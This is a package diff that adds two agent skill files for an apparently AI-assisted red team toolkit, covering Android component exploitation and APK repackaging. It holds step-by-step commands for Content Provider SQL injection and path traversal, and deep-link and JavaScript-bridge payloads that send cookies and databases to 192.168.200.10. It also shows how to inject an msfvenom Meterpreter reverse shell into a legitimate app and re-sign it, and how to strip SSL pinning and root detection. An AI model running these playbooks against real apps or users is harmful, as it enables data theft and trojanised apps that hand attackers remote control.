rtexit-method 0.1.14 → 0.1.15

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "rtexit-method",
-  "version": "0.1.14",
+  "version": "0.1.15",
   "description": "RTExit - AI-assisted Red Team methodology installer",
   "license": "MIT",
   "author": "Exit Code",

package/packaged-assets/.agents/skills/rt-android-intent-exploitation/SKILL.md

@@ -0,0 +1,251 @@
+---
+name: rt-android-intent-exploitation
+description: "Android component exploitation — exported Activities, Services, BroadcastReceivers, ContentProviders. ADB intent fuzzing, Drozer deep dive, Content Provider SQL injection and path traversal, intent sniffing, WebView JavaScript bridge exploitation, deep link hijacking, task hijacking. These are unique Android attack surfaces not found in web testing. Docker: rtexit/kali:v3.1."
+---
+
+> 🐳 **Docker Environment (Recommended):** `docker exec -it rtexit-kali bash`
+
+# rt-android-intent-exploitation — Android Component & Intent Attacks
+
+## Overview
+
+Android's inter-process communication (IPC) via Intents and exported components is a unique attack surface. Many apps expose Activities, Services, and ContentProviders without authentication — allowing privilege escalation, data theft, and code execution within the app's permission scope.
+
+**When to use:**
+- App has exported components in AndroidManifest.xml
+- ContentProvider is accessible by other apps
+- Deep links / URL schemes are in scope
+- WebView with JavaScript bridges is present
+- Task hijacking or phishing against a specific app
+
+---
+
+## Phase 1: Component Discovery
+
+```bash
+docker exec rtexit-kali bash -c "
+# Method 1: jadx + grep
+jadx -d /tmp/target_java target.apk 2>/dev/null
+grep -r 'exported.*true\|android:exported' /tmp/target_dc/AndroidManifest.xml
+
+# Method 2: apktool + manifest analysis
+apktool d target.apk -o /tmp/target_dc
+grep -A5 'activity\|service\|receiver\|provider' /tmp/target_dc/AndroidManifest.xml | grep -B2 'exported\|intent-filter'
+
+# Method 3: Drozer (most comprehensive)
+# Start Drozer agent on device
+adb forward tcp:31415 tcp:31415
+drozer console connect
+"
+```
+
+```
+# Drozer — enumerate all components
+dz> run app.package.list -f target
+dz> run app.package.info -a com.target.app
+dz> run app.activity.info -a com.target.app
+dz> run app.service.info -a com.target.app
+dz> run app.broadcast.info -a com.target.app
+dz> run app.provider.info -a com.target.app
+dz> run app.provider.finduri -a com.target.app
+```
+
+---
+
+## Phase 2: Activity Exploitation
+
+```bash
+docker exec rtexit-kali bash -c "
+# Launch exported activity directly (bypass login, authentication)
+adb shell am start \
+  -n com.target.app/.AdminActivity \
+  --es username 'admin' \
+  --ez is_admin true
+
+# Activity with intent filter — try launching with data
+adb shell am start \
+  -a com.target.app.action.VIEW_REPORT \
+  -d 'content://com.target.app/reports/1' \
+  -n com.target.app/.ReportActivity
+
+# Pass unexpected data types to trigger logic errors
+adb shell am start \
+  -n com.target.app/.PaymentActivity \
+  --ei amount -1 \
+  --es target_account 'attacker@evil.com'
+"
+```
+
+```
+# Drozer — launch activity
+dz> run app.activity.start --component com.target.app com.target.app.AdminActivity
+dz> run app.activity.start --component com.target.app com.target.app.AdminActivity --extra string bypass true
+```
+
+---
+
+## Phase 3: Content Provider Exploitation
+
+```bash
+docker exec rtexit-kali bash -c "
+# Query all URIs from ContentProvider
+adb shell content query --uri content://com.target.app/users
+adb shell content query --uri content://com.target.app/messages
+
+# Try common URI patterns
+for table in users messages accounts files credentials tokens; do
+  echo -n \"Trying content://com.target.app/\$table: \"
+  adb shell content query --uri \"content://com.target.app/\$table\" 2>&1 | head -2
+done
+"
+```
+
+```
+# Drozer — Content Provider SQL injection
+dz> run app.provider.query content://com.target.app/users --selection "1=1"
+dz> run app.provider.query content://com.target.app/users --projection "* FROM users--"
+dz> run app.provider.query content://com.target.app/users --selection "1=1 UNION SELECT username,password,null,null FROM users--"
+
+# Content Provider path traversal (file:// URIs)
+dz> run app.provider.read content://com.target.app/files/../../../data/data/com.target.app/databases/main.db
+dz> run app.provider.download content://com.target.app/files/../../../../data/data/com.target.app/shared_prefs/config.xml /tmp/config.xml
+```
+
+---
+
+## Phase 4: BroadcastReceiver Exploitation
+
+```bash
+docker exec rtexit-kali bash -c "
+# Send broadcast to exported receiver
+adb shell am broadcast \
+  -a com.target.app.action.UPDATE \
+  -n com.target.app/.UpdateReceiver \
+  --es update_url 'http://192.168.200.10/malicious.apk'
+
+# Broadcast to trigger SMS or notification
+adb shell am broadcast \
+  -a android.provider.Telephony.SMS_RECEIVED \
+  -n com.target.app/.SmsReceiver \
+  --es body 'RESET_PASSWORD admin 1234'
+
+# Steal ordered broadcast result
+adb shell am broadcast -a com.target.app.AUTH_TOKEN --ei priority 999
+"
+```
+
+---
+
+## Phase 5: Deep Link / URL Scheme Hijacking
+
+```bash
+docker exec rtexit-kali bash -c "
+# Identify deep links from manifest
+grep -r 'scheme\|host\|pathPrefix\|data android' /tmp/target_dc/AndroidManifest.xml
+
+# Test deep link handling
+adb shell am start \
+  -a android.intent.action.VIEW \
+  -d 'myapp://reset-password?token=INJECTED&admin=true'
+
+# Try deep link with malicious parameters
+adb shell am start \
+  -a android.intent.action.VIEW \
+  -d 'myapp://webview?url=file:///data/data/com.target.app/databases/'
+
+# UXSS via WebView deep link
+adb shell am start \
+  -a android.intent.action.VIEW \
+  -d 'myapp://webview?url=javascript:document.location=\"http://192.168.200.10/?c=\"+document.cookie'
+"
+```
+
+---
+
+## Phase 6: WebView JavaScript Bridge Exploitation
+
+```bash
+docker exec rtexit-kali bash -c "
+# Find @JavascriptInterface annotated methods in source
+grep -r 'JavascriptInterface\|addJavascriptInterface' /tmp/target_java -r -l
+"
+```
+
+```java
+// Example vulnerable bridge
+@JavascriptInterface
+public String readFile(String path) {
+    return new String(Files.readAllBytes(Paths.get(path)));
+}
+
+// Attack: if WebView loads attacker-controlled URL
+// <script>
+//   const data = JSBridge.readFile('/data/data/com.target.app/databases/main.db');
+//   fetch('http://192.168.200.10/leak?d=' + btoa(data));
+// </script>
+```
+
+```bash
+docker exec rtexit-kali bash -c "
+# If WebView loads arbitrary URLs via deep link:
+adb shell am start -a android.intent.action.VIEW \
+  -d 'myapp://webview?url=http://192.168.200.10/exploit.html'
+
+# exploit.html calls JSBridge methods to exfiltrate data
+"
+```
+
+---
+
+## Phase 7: Task Hijacking (StrandHogg)
+
+```bash
+docker exec rtexit-kali bash -c "
+# StrandHogg: malicious app intercepts legitimate app's task
+# Vulnerable when: taskAffinity + allowTaskReparenting
+
+# Check if target is vulnerable
+grep -A5 'MainActivity\|LauncherActivity' /tmp/target_dc/AndroidManifest.xml | grep -i 'taskAffinity\|allowTask'
+
+# If vulnerable: malicious app with same taskAffinity appears over target app
+# User thinks they're in legitimate app but entering creds into malicious one
+"
+```
+
+---
+
+## Phase 8: ADB Exploitation
+
+```bash
+docker exec rtexit-kali bash -c "
+# Extract all SQLite databases
+adb shell 'su -c ls /data/data/com.target.app/databases/'
+adb pull /data/data/com.target.app/databases/ /tmp/dbs/
+
+# Extract SharedPreferences (often has tokens)
+adb pull /data/data/com.target.app/shared_prefs/ /tmp/prefs/
+cat /tmp/prefs/*.xml | grep -i 'token\|key\|pass\|auth\|secret'
+
+# Check logcat for credential leaks
+adb logcat | grep -i 'password\|token\|secret\|key\|auth' | head -50
+
+# Backup exploitation (pre-Android 12)
+adb backup -noencrypt -noapk com.target.app
+python3 android-backup-extractor.py backup.ab backup.tar
+tar -xvf backup.tar
+find . -name '*.db' -o -name '*.xml' -o -name '*.json' | xargs grep -i 'token\|pass\|secret'
+"
+```
+
+---
+
+## Related Skills
+- `rt-exploit-android` — full Android methodology
+- `rt-frida-advanced` — hook intent handling at runtime
+- `rt-mobile-static-deep` — static analysis to find these vulnerabilities
+- `rt-exploit-injection` — SQL injection in Content Providers
+
+## References
+- https://github.com/WithSecureLabs/drozer
+- https://attack.mitre.org/techniques/T1409/ — Access Stored Application Data
+- https://owasp.org/www-project-mobile-top-10/ — M1-M10

package/packaged-assets/.agents/skills/rt-apk-repackaging/SKILL.md

@@ -0,0 +1,270 @@
+---
+name: rt-apk-repackaging
+description: "APK repackaging, smali patching, and payload injection — decompile any APK, patch bytecode to remove security checks or inject payloads, repackage and sign. Covers: injecting Metasploit/Frida payloads into real apps, bypassing root detection via smali, removing debug flags, patching hardcoded values, certificate bypass via smali. Docker: rtexit/kali:v3.1 has apktool, jadx, uber-apk-signer."
+---
+
+> 🐳 **Docker Environment (Recommended):** `docker exec -it rtexit-kali bash`
+
+# rt-apk-repackaging — APK Patching, Smali Injection & Payload Embedding
+
+## Overview
+
+Repackaging lets you modify any Android APK without source code — patch security controls, inject payloads, or embed Frida Gadget. Essential when you need persistent access or when dynamic bypass (Frida) isn't possible.
+
+**When to use:**
+- SSL pinning survives all runtime bypasses → patch smali directly
+- Need to inject a backdoor into a legitimate app for client demonstration
+- Disable certificate pinning, root detection, or tamper detection permanently
+- Embed Frida Gadget for non-rooted device testing
+- Modify app behavior to trigger specific code paths
+
+---
+
+## Setup
+
+```bash
+docker exec rtexit-kali bash -c "
+# Verify tools
+apktool --version
+jadx --version
+java -version
+
+# Install uber-apk-signer (easier than keytool + jarsigner)
+wget https://github.com/patrickfav/uber-apk-signer/releases/download/v1.3.0/uber-apk-signer-1.3.0.jar -O /opt/uber-apk-signer.jar
+alias uas='java -jar /opt/uber-apk-signer.jar'
+"
+```
+
+---
+
+## Phase 1: Decompile & Analyze
+
+```bash
+docker exec rtexit-kali bash -c "
+# Extract APK from device (if not available)
+APP_PKG=com.target.app
+APK_PATH=\$(adb shell pm path \$APP_PKG | cut -d: -f2 | tr -d '\r')
+adb pull \$APK_PATH /tmp/target.apk
+echo 'APK pulled to /tmp/target.apk'
+
+# Decompile
+apktool d /tmp/target.apk -o /tmp/target_dc --no-debug-info
+
+# Also decompile to Java for reading logic
+jadx -d /tmp/target_java /tmp/target.apk
+
+# Check interesting files
+cat /tmp/target_dc/AndroidManifest.xml | grep -E 'exported|permission|debuggable|networkSecurity'
+ls /tmp/target_dc/res/xml/ 2>/dev/null  # look for network_security_config.xml
+"
+```
+
+---
+
+## Phase 2A: Remove SSL Pinning via Smali
+
+```bash
+docker exec rtexit-kali bash -c "
+# Find pinning code in smali
+grep -r 'CertificatePinner\|checkServerTrusted\|TrustManager\|pinning' /tmp/target_dc/smali* -l
+
+# Find the pinning method in smali — e.g.:
+# .method public checkServerTrusted([Ljava/security/cert/X509Certificate;Ljava/lang/String;)V
+# .locals 0
+# return-void   ← what we want
+# .end method
+
+# Current code may throw an exception. Patch to return-void:
+# Open the smali file and change the method body to just 'return-void'
+"
+```
+
+```smali
+# Example: patch checkServerTrusted to do nothing (bypass)
+.method public checkServerTrusted([Ljava/security/cert/X509Certificate;Ljava/lang/String;)V
+    .locals 0
+    
+    return-void   # ← just return, no validation
+    
+.end method
+
+# Also patch checkClientTrusted and getAcceptedIssuers
+.method public getAcceptedIssuers()[Ljava/security/cert/X509Certificate;
+    .locals 1
+    
+    const/4 v0, 0x0
+    new-array v0, v0, [Ljava/security/cert/X509Certificate;
+    return-object v0
+    
+.end method
+```
+
+---
+
+## Phase 2B: Remove Root Detection via Smali
+
+```bash
+docker exec rtexit-kali bash -c "
+# Find root detection methods
+grep -r 'isRooted\|RootBeer\|checkRoot\|detectRoot\|su\|superuser' /tmp/target_dc/smali* -l
+
+# Pattern: find method that returns boolean and calls root checks
+# Patch to always return false
+"
+```
+
+```smali
+# Patch isRooted() to always return false
+.method public isRooted()Z
+    .locals 1
+    
+    const/4 v0, 0x0    # false
+    return v0
+    
+.end method
+```
+
+---
+
+## Phase 2C: Inject Metasploit Payload into Real APK
+
+```bash
+docker exec rtexit-kali bash -c "
+# Step 1: Generate payload .apk
+msfvenom -p android/meterpreter/reverse_https \
+  LHOST=192.168.200.10 LPORT=4444 \
+  -o /tmp/payload.apk
+
+# Step 2: Decompile both APKs
+apktool d /tmp/target.apk -o /tmp/target_dc
+apktool d /tmp/payload.apk -o /tmp/payload_dc
+
+# Step 3: Copy payload smali into target
+cp -r /tmp/payload_dc/smali/com/metasploit /tmp/target_dc/smali/com/
+
+# Step 4: Add permissions to target AndroidManifest.xml
+# (that payload needs but target may not have)
+# Common: INTERNET, READ_PHONE_STATE, ACCESS_NETWORK_STATE
+# Add between existing <uses-permission> tags
+
+# Step 5: Hook MainActivity.onCreate to launch payload
+# Find MainActivity.smali in target
+# Add at start of onCreate:
+# invoke-static {}, Lcom/metasploit/stage/Payload;->start([Ljava/lang/String;)V
+
+# Step 6: Repackage + sign
+apktool b /tmp/target_dc -o /tmp/target_injected.apk
+java -jar /opt/uber-apk-signer.jar -a /tmp/target_injected.apk --out /tmp/signed/
+adb install /tmp/signed/target_injected-aligned-debugSigned.apk
+"
+```
+
+```smali
+# Inject payload call into MainActivity.onCreate
+# Add BEFORE super.onCreate() call:
+
+invoke-static {}, Lcom/metasploit/stage/Payload;->start([Ljava/lang/String;)V
+```
+
+---
+
+## Phase 2D: Inject Frida Gadget (No Root Needed)
+
+```bash
+docker exec rtexit-kali bash -c "
+# Download gadget
+FRIDA_VER=\$(pip3 show frida | grep Version | awk '{print \$2}')
+wget https://github.com/frida/frida/releases/download/\${FRIDA_VER}/frida-gadget-\${FRIDA_VER}-android-arm64.so.xz -O /tmp/gadget.xz
+unxz /tmp/gadget.xz
+mv /tmp/frida-gadget-* /tmp/target_dc/lib/arm64-v8a/libfrida-gadget.so
+
+# Create Frida Gadget config (listen mode)
+cat > /tmp/target_dc/lib/arm64-v8a/libfrida-gadget.config.so << 'EOF'
+{
+  \"interaction\": {
+    \"type\": \"listen\",
+    \"address\": \"0.0.0.0\",
+    \"port\": 27042
+  }
+}
+EOF
+
+# Find entry point smali (MainActivity or Application)
+# Add library load at very beginning of onCreate or attachBaseContext:
+"
+```
+
+```smali
+# Add to Application.attachBaseContext() or MainActivity.onCreate()
+# This loads Frida Gadget before anything else:
+
+const-string v0, "frida-gadget"
+invoke-static {v0}, Ljava/lang/System;->loadLibrary(Ljava/lang/String;)V
+```
+
+```bash
+docker exec rtexit-kali bash -c "
+# Repackage + sign
+apktool b /tmp/target_dc -o /tmp/target_gadget.apk
+java -jar /opt/uber-apk-signer.jar -a /tmp/target_gadget.apk --out /tmp/signed/
+adb install /tmp/signed/target_gadget-aligned-debugSigned.apk
+
+# Launch app — it pauses waiting for Frida
+adb shell am start -n com.target.app/.MainActivity
+
+# Connect Frida to gadget
+frida -H 127.0.0.1:27042 -n Gadget -l your-script.js
+"
+```
+
+---
+
+## Phase 3: Repackage & Sign
+
+```bash
+docker exec rtexit-kali bash -c "
+# Build patched APK
+apktool b /tmp/target_dc -o /tmp/target_patched.apk
+
+# Sign with debug key (quick)
+java -jar /opt/uber-apk-signer.jar \
+  -a /tmp/target_patched.apk \
+  --out /tmp/signed/ \
+  --allowResign \
+  --overwrite
+
+# Install
+adb install -r /tmp/signed/target_patched-aligned-debugSigned.apk
+"
+```
+
+---
+
+## Phase 4: Bypass Play Integrity / SafetyNet
+
+```bash
+# Apps using Play Integrity API will detect modified APK signature
+# Bypass: Universal SafetyNet Fix (Magisk module on rooted device)
+
+docker exec rtexit-kali bash -c "
+# On rooted device: install Magisk module
+# Universal SafetyNet Fix + MagiskHide (or Shamiko for Zygisk)
+adb push MagiskModule-safetynetfix.zip /sdcard/
+# Install via Magisk app
+"
+
+# Alternative: use Zygisk + ReZygisk + Shamiko for full detection bypass
+```
+
+---
+
+## Related Skills
+- `rt-frida-advanced` — dynamic instrumentation after repackaging
+- `rt-mobile-ssl-pinning` — patch network_security_config via smali
+- `rt-exploit-android` — full Android methodology
+- `rt-mobile-malware-c2` — deliver repackaged APK as C2 implant
+
+## References
+- https://github.com/iBotPeaches/Apktool
+- https://github.com/skylot/jadx
+- https://attack.mitre.org/techniques/T1406/ — Obfuscated Files or Information